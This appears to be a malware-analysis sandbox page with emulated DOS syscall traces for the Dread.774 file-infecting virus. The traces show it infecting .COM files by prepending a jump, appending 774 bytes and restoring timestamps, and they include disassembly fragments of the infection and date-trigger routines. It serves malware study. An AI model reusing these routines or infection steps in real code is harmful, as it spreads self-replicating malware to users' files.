Sample viewer

vx.netlux.org/Virus.DOS.IVP.Dread.774

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:11.1022532Z 26 PC: 12cc5 | Set disk transfer address
2018-12-17T22:35:11.104864178Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:11.107569799Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:35:11.110760891Z 71 PC: 12b06 | Get current directory
2018-12-17T22:35:11.114833852Z 78 PC: 12b89 | Find first file
2018-12-17T22:35:11.125868574Z 78 PC: 12b89 | Find first file
2018-12-17T22:35:11.136646664Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:11.144176653Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:11.153670668Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:11.156159513Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.174512464Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:35:11.184581017Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:11.188023783Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:11.189939388Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:11.193690395Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-17T22:35:11.341915889Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:11.344062964Z 62 PC: 12cad | Close file
2018-12-17T22:35:11.404135289Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.41659535Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:11.419632807Z 61 PC: 12cce | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:11.427133851Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:11.435278297Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:11.437362406Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.461114666Z 61 PC: 12cce | Open file (Filename = 'PRINT.COM')
2018-12-17T22:35:11.470366834Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:11.47388048Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:11.47576319Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:11.480337378Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-17T22:35:11.497528243Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:11.499671768Z 62 PC: 12cad | Close file
2018-12-17T22:35:11.53058285Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.555073436Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:11.560342037Z 61 PC: 12cce | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:11.573314757Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:11.600836605Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:11.603657829Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.615439029Z 61 PC: 12cce | Open file (Filename = 'HELLO.COM')
2018-12-17T22:35:11.625514303Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:11.62926658Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:11.631420219Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:11.63583852Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-17T22:35:11.645964313Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:11.648088768Z 62 PC: 12cad | Close file
2018-12-17T22:35:11.668099246Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:11.932169753Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:11.9356699Z 61 PC: 12cce | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:11.945171842Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:11.956949387Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:11.959383051Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.185673078Z 61 PC: 12cce | Open file (Filename = 'PHANG.COM')
2018-12-17T22:35:12.193730142Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:12.197127693Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:12.198808682Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:12.202760816Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-17T22:35:12.488658843Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:12.490846792Z 62 PC: 12cad | Close file
2018-12-17T22:35:12.500596528Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.513158632Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:12.516553736Z 61 PC: 12cce | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:35:12.525251715Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:35:12.533630083Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:12.53622825Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.541900083Z 61 PC: 12cce | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:35:12.547537628Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:12.550802748Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:12.552558702Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:12.556192832Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 2)
2018-12-17T22:35:12.563028991Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:12.565137087Z 62 PC: 12cad | Close file
2018-12-17T22:35:12.56825747Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.573906852Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:12.577280931Z 61 PC: 12cce | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:12.585897269Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:12.593850247Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:12.596551514Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.606560316Z 61 PC: 12cce | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:35:12.614634051Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:12.619229341Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:12.622609507Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:12.625614658Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 2)
2018-12-17T22:35:12.636185758Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:12.638088848Z 62 PC: 12cad | Close file
2018-12-17T22:35:12.647284904Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.658145157Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:12.66119794Z 61 PC: 12cce | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:12.677452233Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:12.68535569Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:12.688053498Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.696131733Z 61 PC: 12cce | Open file (Filename = 'PAH.COM')
2018-12-17T22:35:12.700979672Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 2)
2018-12-17T22:35:12.702925565Z 66 PC: 12cc0 | Move file pointer
2018-12-17T22:35:12.704988522Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-17T22:35:12.708207257Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 2)
2018-12-17T22:35:12.724339103Z 87 PC: 12ca9 | Get or set file date and time
2018-12-17T22:35:12.727079514Z 62 PC: 12cad | Close file
2018-12-17T22:35:12.736917413Z 67 PC: 12cd9 | Get or set file attributes
2018-12-17T22:35:12.748766507Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:12.752489499Z 61 PC: 12cce | Open file (Filename = 'TEST.COM')
2018-12-17T22:35:12.760294561Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:35:12.764349894Z 62 PC: 12ba8 | Close file
2018-12-17T22:35:12.76688182Z 79 PC: 12b89 | Find next file
2018-12-17T22:35:12.771845285Z 59 PC: 12b1c | Change current directory
2018-12-17T22:35:12.776552321Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-17T22:35:12.779362948Z 76 PC: 12b2e | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:08.122394875Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:08.124152081Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.125377848Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.126549194Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:08.129863311Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:08.13674781Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:08.143285254Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:08.150617528Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:08.157943264Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:08.159933893Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:08.19960974Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.207920999Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:08.211323922Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:08.213166906Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:08.216745093Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:08.231951978Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:08.234139569Z 62 PC: 12cad | Close file
2018-12-25T11:59:08.251251108Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.262478954Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.265488631Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.27349736Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.281073807Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.283298508Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.294966852Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.302888385Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.306851405Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.308704203Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.312429099Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.322145382Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.324353579Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.338357351Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.349678924Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.353005051Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.361853127Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.369205751Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.371222641Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.383659179Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.391122846Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.39425706Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.39667624Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.399468858Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.408867524Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.412212559Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.421843165Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.433251194Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.436775018Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.446174726Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.454186621Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.45684785Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.468507307Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.476131528Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.47977916Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.48272648Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.485828821Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.495390963Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.498547656Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.507228998Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.521796263Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.525204106Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.534050205Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.541493986Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.544030017Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.549669045Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.555103065Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.558245807Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.56099415Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.563961754Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.588696488Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.591727721Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.594036507Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.599224207Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.603179221Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.610505912Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.617463289Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.61983884Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.633209853Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.641190117Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.64438865Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.646328963Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.649270441Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.659382581Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.662587289Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:08.67143396Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.682376529Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.686104962Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.693308388Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.708734651Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.711574548Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:08.722775748Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.730380296Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:08.736695379Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:08.738638833Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:08.741904496Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:08.899069227Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:08.901886116Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.101248384Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.124419941Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.127337562Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.134365581Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.13773648Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.139828164Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.142955274Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:09.1484175Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:09.151334427Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:09.162258101Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.163966902Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:09.166234632Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:09.167468113Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:08.126350646Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:08.128159029Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.129333758Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:08.13044794Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:08.13370263Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:08.139445705Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:08.149844489Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:08.161713931Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:08.16777934Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:08.169577051Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.296277895Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.302869197Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.305460127Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.307071882Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.309449162Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.500845605Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.503044695Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.55679277Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.566850365Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.569522023Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.576119314Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.582266085Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.583943935Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.594350828Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.601146488Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.604219461Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.606272812Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.608990331Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.617542674Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.620186351Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.628307298Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.849457934Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.852229267Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.858604188Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.864698865Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.866834331Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.156836072Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.163984854Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.168010227Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.175776008Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.178056855Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.286300002Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.293683129Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.301467044Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.312089022Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.315300305Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.321967412Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.328532882Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.331756058Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.342062283Z 61 PC: 12cce | Open file (See above)
